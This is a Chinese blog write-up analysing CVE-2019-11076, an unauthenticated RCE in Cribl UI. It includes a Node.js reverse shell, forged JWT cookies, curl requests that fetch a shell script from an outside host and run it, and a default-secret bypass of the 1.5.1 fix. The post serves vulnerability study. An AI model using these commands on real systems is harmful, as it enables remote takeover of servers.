cve-2019-11076 Cribl UI 1.5.0 未授权命令执行漏洞分析

最新推荐文章于 2024-05-26 22:29:50 发布
最新推荐文章于 2024-05-26 22:29:50 发布
阅读量474 收藏 1
点赞数
原文链接:https://xz.aliyun.com/t/7139
版权

Cribl是一款日志分析工具。Cribl UI是其中的一个用户界面。 Cribl UI 1.5.0版本中存在安全漏洞。远程攻击者可借助未认证的Web请求利用该漏洞运行任意命令。

前言

前几天瞎逛 Github 看到的一个 CVE,就跟着调试一下,顺便记录一下调试过程中的收获。

repo 链接:poc-cribl-rce

以下是作者提供的描述:

Info

Tested on Cribl v1.5.0 - Previous versions not tested but likely vulnerable.
A valid JWT token can be transfered from and injected into the session of another Cribl instance, giving the user unauthorised access.
Furthermore, the encryption key used on to generate the JWT/Session can be used to create a valid session for any username, with an extended expiry.

This, combined with the ability to run scripts within Cribl allows a remote attacker to run malicious code on a Crible instance in order to gain further control.
An example of such can be seen below, using the scripts page and a long expiry JWT token, it was possible to create a reverse shell.

Tested using Docker (Alpine).

环境搭建

根据作者的描述,该问题在 1.5.0 上被验证存在,之前的版本不排除有该问题,但作者尚未验证,因此这里使用 1.4.3 的环境进行测试:

# pull docker
docker pull cribl/cribl:1.4.3
# run docker
docker run -p 9000:9000 -d cribl/cribl:1.4.3

然后访问 9000 端口,可以看到如下页面,使用 admin/admin 即可登录:

漏洞测试

根据作者的描述,该漏洞属于任意命令执行的漏洞,但由于没有回显,需要通过反弹 shell 的方式获得可以交互的命令行。考虑到 cribl 本身具有 nodejs 环境,因此可以考虑结合 nodejs 的反弹 shell 脚本进行攻击。

因此,漏洞的利用思路如下:

  1. 使用 wget 或其他方式将反弹 shell 的脚本写入受影响的环境
  2. 利用 nodejs 执行该脚本,反弹 shell

第一步,先在自己的 vps 上部署 nodejs 的反弹 shell 脚本(这里需要将 YOUR_REMOTE_IP_OR_FQDN 替换为具体的地址或域名):

var net = require("net"), sh = require("child_process").exec("/bin/sh");
var client = new net.Socket();
client.connect(6669, "YOUR_REMOTE_IP_OR_FQDN", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});

然后准备好监听 6669 端口:

nc -lvp 6669

下一步就是使用任意命令执行的漏洞,先利用 wget 下载反弹 shell 的脚本:

# wget
curl 'http://127.0.0.1:9000/api/v1/system/scripts' \
-H 'Content-Type: application/json' \
-H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY' \
--data-binary '{"id":"runme","command":"/usr/bin/wget","args":["http://xxx.xxx.xxx/shell.js","-P","/opt"],"env":{}}' --compressed

# {"count":1,"items":[{"command":"/usr/bin/wget","args":["http://static.syang.xyz/shell.js","-P","/opt"],"env":{},"id":"runme"}]}

# exec wget
curl 'http://127.0.0.1:9000/api/v1/system/scripts/runme/run' \
-H 'Content-Type: application/json' \
-H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY' \
--data-binary '{}' --compressed

# {"pid":36,"stdout":"N/A","stderr":"N/A"}

# nodejs
curl 'http://127.0.0.1:9000/api/v1/system/scripts' \
 -H 'Content-Type: application/json'\
 -H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY' \
--data-binary '{"id":"reverseit","command":"node","args":["/opt/shell.js"],"env":{}}' --compressed

# {"count":1,"items":[{"command":"node","args":["/opt/shell.js"],"env":{},"id":"reverseit"}]}

# exec nodejs
curl 'http://127.0.0.1:9000/api/v1/system/scripts/reverseit/run' \
-H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY' \
--data-binary '{}' --compressed

# {"pid":37,"stdout":"N/A","stderr":"N/A"}

成功反弹 shell:

PS:原作者 poc 中有一个很奇怪的地方,第二次未授权访问的时候使用了一个错误的 Cookie…

漏洞分析

下面来看继续分析这个漏洞的成因,可以看到任意命令执行是该应用自带的功能。访问 http://localhost:9000/settings/scripts 可以看到之前 poc 所生成的两项:

如果我们使用授权的 admin / admin 账号,可以直接增加并执行命令:


所以该漏洞的主要问题在于未授权,即未登陆的状态下也可以利用伪造的 JWT token进行任意命令执行。

下面结合源码来分析漏洞所在。可以看到文件夹结构如下:

结合 docker 的 entrypoint.sh:

#!/bin/sh

# Assumed to be an s3 location
if [ -n "$CRIBL_CONFIG_LOCATION" ]; then
    aws s3 sync "$CRIBL_CONFIG_LOCATION" /opt/cribl/local/cribl
fi

if [ -n "$CRIBL_SCRIPTS_LOCATION" ]; then
    mkdir -p /opt/cribl/scripts
    aws s3 sync "$CRIBL_SCRIPTS_LOCATION" /opt/cribl/scripts
    chmod -R 755 /opt/cribl/scripts
fi

if [ "$1" = "cribl" ]; then
    node /opt/cribl/bin/cribl.bundle.js server
fi

exec "$@"

以及 start.sh:

#!/bin/bash

NODECMD=node
STARTCMD="$NODECMD cribl.bundle.js server"
echo "$STARTCOMD"

DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
cd $DIR

# exec the command so it can receive kill signals
exec $STARTCMD

可以看到最核心的代码为 cribl.bundle.js,进入分析:

 

可以很明显看到该代码是由 webpack 之类工具打包生成的了。。第一眼看上去一头雾水(─.─||)
那么就需要结合一定的技巧进行分析,可以搜索关键词 cribl_auth,因为 Cookie 中的 cribl_auth 字段即 JWT token,定位到下图的关键代码:

美化之后如下:

var f = "d2hvIGxldCB0aGUgZG9ncyBvdXQ=";
var p = 4 * 3600;
var h = "cribl_auth";
var d = "/auth";
var v = "Bearer ";
var m = [d + "/"];

function y(e, t, r) {
    if (e.method === "OPTIONS") {
        r();
        return
    }
    for (var n = 0; n < m.length; n++) {
        if (e.path.startsWith("" + m[n])) {
            r();
            return
        }
    }
    var i = e.cookies && e.cookies[h];
    if (!i) {
        var o = e.header("authentication");
        if (o && o.startsWith(v)) {
            i = o.substr(v.length)
        }
    }
    try {
        a.decode(i || "", f);
        r()
    } catch (e) {
        t.sendStatus(401)
    }
}

可以看到逻辑非常简单,只要 jwt token 解码成功即可成功通过验证,而且无需如 admin 之类的特定用户名。结合作者的描述,可以认为主要还是硬编码的 secret d2hvIGxldCB0aGUgZG9ncyBvdXQ= 增大了伪造的可能性降低了程序的安全性。

顺便看看这个 secret 是什么:

echo "d2hvIGxldCB0aGUgZG9ncyBvdXQ=" | base64 -d
who let the dogs out

Emmm,开发者你开心就好。

最后来看一下开发者是使用哪一个库来生成 jwt token 的,搜索 JWT 关键词:

可以看到诸如版本信息,报错信息等关键字符串,结合上述信息进行搜索,可以搜到:https://github.com/hokaccha/node-jwt-simple

写个脚本印证一下:

var jwt = require('jwt-simple');
var payload = {
  "username": "admin",
  "exp": 9999999999
};
var secret = 'd2hvIGxldCB0aGUgZG9ncyBvdXQ=';

// encode
var token = jwt.encode(payload, secret);
console.log(token);

// decode
var decoded = jwt.decode(token, secret);
console.log(decoded);

可以看到和 poc 的作者所使用的 cookie 是一样的☑️:

node test.js
# output
# eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY
# { username: 'admin', exp: 9999999999 }

修复

让我们看看后续版本是如何修复的,老规矩,使用 v1.5.1 版本的 image,映射到 9001 端口:

# pull docker
docker pull cribl/cribl:1.5.1
# run docker
docker run -p 9001:9000 -d cribl/cribl:1.5.1

可以看到之前的 exp 已经不能生效了:

curl 'http://127.0.0.1:9001/api/v1/system/scripts' \
-H 'Content-Type: application/json' \
-H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY' \
--data-binary '{"id":"runme","command":"/usr/bin/wget","args":["http://static.syang.xyz/shell.js","-P","/opt"],"env":{}}' --compressed

# output
# Unauthorized

跟进源码,查看 v1.5.1 对程序进行了何种修改:

var p = 4 * 3600;
var d = "cribl_auth";
var h = "/auth";
var m = "Bearer ";
var v = [h + "/"];
var g;

function y() {
    if (!g) {
        g = l.getCreateCriblSecret()
    }
    return g
}

function b(e, t, r) {
    if (e.method === "OPTIONS") {
        r();
        return
    }
    for (var n = 0; n < v.length; n++) {
        if (e.path.startsWith("" + v[n])) {
            r();
            return
        }
    }
    var i = e.cookies && e.cookies[d];
    if (!i) {
        var o = e.header("authorization");
        if (o && o.startsWith(m)) {
            i = o.substr(m.length)
        }
    }
    y().then(function (e) {
        var t = a.decode(i || "", e);
        if (!t.username) throw new Error("Invalid auth token, missing username");
        r()
    }).catch(function (e) {
        t.sendStatus(401)
    })
}

// 其中 l.getCreateCriblSecret = w

function w() {
    if (!b) {
        var e = c.join(process.env.CRIBL_HOME || "", "local", "cribl", "auth", "cribl.secret");
        b = o.callbackToPromise(l.readFile, e).catch(function (t) {
            return u.mkdirp(c.dirname(e)).then(function () {
                var t = a.randomBytes(256).toString("base64");
                return u.atomicFileWrite(e, t).then(function () {
                    return t
                })
            })
        }).then(function (e) {
            return Buffer.from(e.toString(), "base64")
        })
    }
    return b
}

可以看到关键的 secret 不再硬编码,改成了从 /opt/local/cribl/auth/cribl.secret 该文件中进行读取。

那么考虑到使用 docker 中自带的密钥,是否可以伪造 cookie?

var jwt = require('jwt-simple');
var payload = {
  "username": "admin",
  "exp": 9999999999
};

// encode
var secret = Buffer.from("vCN2P8hvUL2mvY6JZ5HhkXyNJzaSVvhOhBuZF9h34K6UbrhbPnr23/shnY09hZPUpKOTDIMql1POyPOOEygj67LPyYd57hxLmMgbVQ8IcsxLF3pu+gcc0qzrgzInWpSRXL0t4hTKDhRwR94xo/1G0nZfG8uh8M7jH3Wnr80Jujnyx0fjYhq1sWTd3ESnT2c8fUtqLwyEyx2yGeXKp+pXmrIYgFtjxDemsuUVzZlrj/fTgF+IlgWS2cxxkBRpAxxVurfZVE1E3oP8VM+73QMFOMcWrT8ABqEvhFhGBC/izNR7lKF7rkDjkwftc8UY0uvDOImaC/H/GM3ab53pyDdcNQ==", "base64")
var token = jwt.encode(payload, secret);

// decode
var decoded = jwt.decode(token, secret);
console.log(decoded);

Emmm,实验成功了。。只能说如果开发者在生产环境中不换默认的 secret 最后还是会翻车,照样未授权 RCE。

curl 'http://127.0.0.1:9001/api/v1/system/scripts' \
-H 'Content-Type: application/json' \
-H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.zRHkFfc7WtMIqFtfvSd2FUyxHxW8TlnVZtn87sNMVYc' \
--data-binary '{"id":"list","command":"ls","args":["-al"],"env":{}}' --compressed
# output
# {"count":1,"items":[{"command":"ls","args":["-al"],"env":{},"id":"list"}]}

总结

事实又一次强调了开发过程中注意安全的重要性,但在这波分析之后,个人感觉这个洞本质上有点弱?之前版本的问题主要在于硬编码密钥,之后的版本改为了通过配置文件配置密钥。但这种配置方式在某种程度上仍然存在一定问题,比如开发者在生产环境中没有配置新的密钥,那用默认的密钥同样可以伪造签名。。

 

 

whatday
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【转】反弹Shell,看这一篇就够了
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹个shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell呢
【Django】后台admin应用SimpleUI实战
微雨停了的博客
05-15 1万+
文章目录一、SimpleUI是什么二、安装SimpleUI2.1 pip安装2.2 应用注册2.3 注册超级管理员2.3 登陆验证三、美化SimpleUI3.1 设置中文3.2 更换后台登陆logo3.3 屏蔽右侧广告3.4 更改管理后台名字3.5 验证四、admin后台数据管理4.1 查看users数据表4.2 编辑users应用中admin.py文件4.3 自定义列表4.4 自定义菜单4.5 如果一个项目有多个应用、一个应用有多个model表4.5.1 一个app注册多个model — admin.py
反弹shell详细易懂讲解,看这一篇就够了
最新发布
LCW991207的博客
05-26 1391
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
反弹shell的方法总结(base64绕过等等)
weixin_50464560的博客
04-01 8679
前言 什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么需要反弹shell? 反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。以下详细介绍Win
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 5387
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
反弹Shell的方式和详解
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell(反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
OpenSSH 存在输入验证错误漏洞(CVE-2019-16905)修复补丁及命令
01-15
在2019年,OpenSSH被发现存在一个名为CVE-2019-16905的输入验证错误漏洞。这个漏洞允许攻击者通过精心构造的公钥文件,可能导致服务崩溃或者可能执行任意代码,对系统安全构成严重威胁。为了保护系统免受此漏洞的...
wps2012专业版序列号大全
09-03
整理收集所有的wps2009专业版序列号和wps2012专业版序列号,,,,大部分测试通过,其他没测试,,欢迎大家测试使用
wps2016注册码
08-10
wps2016注册码
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2392
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
Web应用渗透测试系统(Python)
毕业作品网站
11-04 5308
本项目命名为Sec-Tools,是一款基于的多功能 Web 应用渗透测试系统,包含漏洞检测、目录识别、端口扫描、指纹识别、域名探测、旁站探测、信息泄露检测等功能。
反弹shell原理与实现
悦分享
08-02 3316
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
signature=ed88ffbce8c305c9b9c73bacff2eb44d,HC-SR04 problem with pic18f24k22.
热门推荐
weixin_33330762的博客
05-29 8万+
0HC-SR04 problem with pic18f24k22.Hello, I have a problem with HCSR04 ultrasonic distance sensor. I wrote a code that works perfectly in proteus simulator but when I uplode it in real mikrochip it sto...
CVE-2019-11477漏洞详解详玩(删)
Netfilter
06-28 6282
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值